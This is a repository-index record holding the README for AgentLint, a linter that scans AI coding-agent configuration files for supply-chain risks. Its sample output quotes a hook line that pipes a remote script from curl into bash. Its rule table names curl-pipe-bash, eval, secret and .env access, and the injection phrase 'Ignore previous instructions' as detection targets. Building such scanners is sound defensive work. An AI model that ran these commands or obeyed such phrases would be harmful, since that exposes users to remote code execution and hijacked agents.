{"id":42976961,"url":"https://github.com/akz4ol/agentlint","last_synced_at":"2026-01-31T01:37:52.104Z","repository":{"id":331906036,"uuid":"1132043192","full_name":"akz4ol/agentlint","owner":"akz4ol","description":"Supply-chain security for AI agent configurations. Scan Claude Code, Cursor, and CLAUDE.md files for risky patterns.","archived":false,"fork":false,"pushed_at":"2026-01-11T16:54:48.000Z","size":167,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"main","last_synced_at":"2026-01-11T18:44:29.207Z","etag":null,"topics":["ai","ai-agents","claude","cli","cursor","devops","devsecops","linter","sarif","security","static-analysis","supply-chain","supply-chain-security","typescript"],"latest_commit_sha":null,"homepage":"https://github.com/akz4ol/agentlint#readme","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/akz4ol.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":"SUPPORT.md","governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":"MAINTAINERS.md","copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2026-01-11T07:46:19.000Z","updated_at":"2026-01-11T16:54:50.000Z","dependencies_parsed_at":null,"dependency_job_id":null,"html_url":"https://github.com/akz4ol/agentlint","commit_stats":null,"previous_names":["akz4ol/agentlint"],"tags_count":3,"template":false,"template_full_name":null,"purl":"pkg:github/akz4ol/agentlint","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/akz4ol%2Fagentlint","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/akz4ol%2Fagentlint/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/akz4ol%2Fagentlint/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/akz4ol%2Fagentlint/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/akz4ol","download_url":"https://codeload.github.com/akz4ol/agentlint/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/akz4ol%2Fagentlint/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":28926283,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-01-30T22:32:35.345Z","status":"ssl_error","status_checked_at":"2026-01-30T22:32:31.927Z","response_time":66,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["ai","ai-agents","claude","cli","cursor","devops","devsecops","linter","sarif","security","static-analysis","supply-chain","supply-chain-security","typescript"],"created_at":"2026-01-31T01:37:51.995Z","updated_at":"2026-01-31T01:37:52.078Z","avatar_url":"https://github.com/akz4ol.png","language":"TypeScript","funding_links":[],"categories":[],"sub_categories":[],"readme":"\u003cp align=\"center\"\u003e\n  \u003ch1 align=\"center\"\u003eAgentLint\u003c/h1\u003e\n  \u003cp align=\"center\"\u003e\n    \u003cstrong\u003eSupply-chain security for AI agent configurations\u003c/strong\u003e\n  \u003c/p\u003e\n  \u003cp align=\"center\"\u003e\n    \u003ca href=\"https://github.com/akz4ol/agentlint/actions/workflows/ci.yml\"\u003e\u003cimg src=\"https://github.com/akz4ol/agentlint/actions/workflows/ci.yml/badge.svg\" alt=\"CI\"\u003e\u003c/a\u003e\n    \u003ca href=\"https://www.npmjs.com/package/agentlint\"\u003e\u003cimg src=\"https://img.shields.io/npm/v/agentlint.svg\" alt=\"npm\"\u003e\u003c/a\u003e\n    \u003ca href=\"https://github.com/akz4ol/agentlint/blob/main/LICENSE\"\u003e\u003cimg src=\"https://img.shields.io/badge/license-Apache%202.0-blue.svg\" alt=\"License\"\u003e\u003c/a\u003e\n  \u003c/p\u003e\n\u003c/p\u003e\n\n---\n\n**AgentLint** helps developers and security teams **audit AI agent configurations** before they execute—catching `curl | bash`, secret leaks, and privilege escalation in Claude Code, Cursor, and CLAUDE.md files.\n\n## Why AgentLint?\n\nAI coding agents are powerful—but their configuration files are a new attack surface:\n\n- **Skills can run shell commands** → supply-chain risk\n- **Hooks execute automatically** → no user approval\n- **Configs reference secrets** → credential exposure\n- **Anyone can share skills** → no vetting process\n\nAgentLint treats agent configs like code: **scan, diff, and gate them in CI.**\n\n## Quick Start\n\n```bash\n# Install\nnpm install -g agentlint\n\n# Scan your project\nagentlint scan\n```\n\n**Expected output (clean project):**\n```\nAgentLint scan: .\n\nParsed: 2 documents (claude=2)\n\nNo findings detected.\n\nStatus: PASS\n```\n\n**Expected output (risky config):**\n```\nAgentLint scan: .\n\nParsed: 4 documents (claude=3, cursor=1)\nContext: hooks detected\n\nFindings:\n  HIGH  EXEC-001 Dynamic Shell Execution\n    .claude/hooks/post_edit.sh:5\n    Evidence: \"curl https://example.com/install.sh | bash\"\n\n  HIGH  SEC-001 Environment Secret Reference\n    CLAUDE.md:14\n    Reference to secret: $STRIPE_SECRET_KEY\n\nStatus: FAIL (2 high)\n```\n\n## How It Works\n\n```\n┌─────────────────┐     ┌──────────────┐     ┌─────────────┐\n│  .claude/       │     │              │     │             │\n│  .cursorrules   │────▶│  AgentLint   │────▶│  Findings   │\n│  CLAUDE.md      │     │              │     │             │\n└─────────────────┘     └──────────────┘     └─────────────┘\n        │                      │                    │\n        ▼                      ▼                    ▼\n   Parse to IR          Apply 20 Rules      Text/JSON/SARIF\n```\n\n1. **Parse** agent configs into a normalized internal representation\n2. **Analyze** with 20 security rules across 8 categories\n3. **Report** findings with evidence and remediation guidance\n4. **Gate** in CI with configurable severity thresholds\n\n## Examples\n\nTry AgentLint on our example configs:\n\n```bash\n# Clean config (passes)\nagentlint scan examples/minimal\n\n# Risky config (fails with findings)\nagentlint scan examples/realistic\n```\n\nSee [examples/](examples/) for full details.\n\n## What It Detects\n\n| Category | Rules | What It Catches |\n|----------|-------|-----------------|\n| **Execution** | EXEC-001, 002, 003 | `curl \\| bash`, eval, hooks running commands |\n| **Filesystem** | FS-001, 002, 003 | Unscoped writes, `.git/` access, sensitive paths |\n| **Network** | NET-001, 002, 003 | Undeclared network, remote script fetches |\n| **Secrets** | SEC-001, 002, 003 | `$GITHUB_TOKEN`, `.env` access, secret propagation |\n| **Hooks** | HOOK-001, 002 | Auto-triggered side effects, hidden hooks |\n| **Instructions** | INST-001, 002 | \"Ignore previous instructions\", self-modification |\n| **Scope** | SCOPE-001, 002 | Capability expansion, write scope widening |\n| **Observability** | OBS-001, 002 | Missing declarations, no permission manifest |\n\nRun `agentlint rules list` to see all rules, or `agentlint rules explain EXEC-001` for details.\n\n## CI/CD Integration\n\n### GitHub Actions\n\n```yaml\nname: AgentLint\non:\n  pull_request:\n    paths: [\".claude/**\", \".cursorrules\", \"CLAUDE.md\", \"AGENTS.md\"]\n\njobs:\n  scan:\n    runs-on: ubuntu-latest\n    steps:\n      - uses: actions/checkout@v4\n      - run: npm install -g agentlint\n      - run: agentlint scan --ci --format sarif --output agentlint.sarif\n      - uses: github/codeql-action/upload-sarif@v3\n        with:\n          sarif_file: agentlint.sarif\n```\n\nFindings appear as code annotations in PRs via GitHub Code Scanning.\n\n### Exit Codes\n\n| Code | Meaning |\n|------|---------|\n| 0 | Pass |\n| 1 | Findings at/above threshold |\n| 2 | CLI usage error |\n| 3 | Config error |\n| 4 | Parse error |\n| 5 | Internal error |\n\n## Configuration\n\nCreate `agentlint.yaml` to customize behavior:\n\n```yaml\nversion: 1\n\npolicy:\n  fail_on: high      # Fail CI on high severity\n  warn_on: medium    # Warn on medium severity\n\nrules:\n  disable: [OBS-002] # Disable specific rules\n\ncapabilities:\n  fail_on_new_dynamic_shell: true\n  fail_on_sensitive_path_write: true\n```\n\nGenerate a starter config:\n\n```bash\nagentlint init\nagentlint init --ci github  # Include GitHub Actions workflow\n```\n\n## Auto-Fix\n\nAutomatically fix simple issues:\n\n```bash\n# Preview fixes without applying\nagentlint scan --dry-run --fix\n\n# Apply fixes\nagentlint scan --fix\n```\n\nCurrently fixable rules:\n- `OBS-002`: Adds permission manifest comment\n\n## Baseline\n\nSuppress known findings to focus on new issues:\n\n```bash\n# Create/update baseline with current findings\nagentlint scan --update-baseline\n\n# Scan respects baseline automatically\nagentlint scan\n# Output: \"Baseline: 15 known finding(s) suppressed\"\n\n# Ignore baseline to see all findings\nagentlint scan --ignore-baseline\n\n# Remove fixed findings from baseline\nagentlint scan --prune-baseline\n\n# Use custom baseline path\nagentlint scan --baseline path/to/baseline.json\n```\n\n## Diff Mode\n\nDetect behavioral changes between versions:\n\n```bash\nagentlint diff ./before ./after\n```\n\n```\nAgentLint diff: ./before → ./after\n\nBehavioral changes:\n  HIGH  capability_expansion\n    shell_exec: false → true\n\n  HIGH  network_new_outbound\n    network.outbound: false → true\n\nStatus: FAIL (capability expansion detected)\n```\n\n## Comparison with Alternatives\n\n| | AgentLint | Manual Review | No Scanning |\n|---|---|---|---|\n| Detects `curl \\| bash` | Automatic | Maybe | No |\n| CI integration | Native SARIF | Manual | N/A |\n| Diff detection | Semantic | Text diff | None |\n| Time to review | Seconds | Minutes–Hours | N/A |\n\nAgentLint is purpose-built for AI agent configs. General linters miss agent-specific risks.\n\n## Integrations\n\n| Tool | Link |\n|------|------|\n| **VS Code** | [agentlint-vscode](https://github.com/akz4ol/agentlint-vscode) |\n| **GitHub Action** | [agentlint-action](https://github.com/akz4ol/agentlint-action) |\n| **Pre-commit** | [docs/pre-commit.md](docs/pre-commit.md) |\n\n## Roadmap\n\n- [x] Claude Code support (`.claude/`, `CLAUDE.md`)\n- [x] Cursor support (`.cursorrules`)\n- [x] 20 security rules\n- [x] SARIF output for GitHub\n- [x] Diff mode\n- [x] VS Code extension\n- [x] GitHub Action (native)\n- [x] Pre-commit hook\n- [x] Auto-fix for common issues\n- [x] Baseline support for suppressing known findings\n- [ ] Policy-as-code engine\n- [ ] Signed skill packs\n- [ ] Agent config registry\n\n## Documentation\n\n- [CLI Reference](docs/cli.md)\n- [FAQ](docs/faq.md)\n- [Architecture](docs/design.md)\n- [Pre-commit Hook](docs/pre-commit.md)\n- [Contributing](CONTRIBUTING.md)\n- [Security Policy](SECURITY.md)\n\n## Contributing\n\nWe welcome contributions! See [CONTRIBUTING.md](CONTRIBUTING.md) for:\n\n- Development setup\n- Adding new rules\n- Coding standards\n- PR process\n\n## License\n\nApache 2.0 — see [LICENSE](LICENSE)\n\n---\n\n\u003cp align=\"center\"\u003e\n  \u003csub\u003eBuilt to secure the AI agent ecosystem\u003c/sub\u003e\n\u003c/p\u003e\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fakz4ol%2Fagentlint","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fakz4ol%2Fagentlint","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fakz4ol%2Fagentlint/lists"}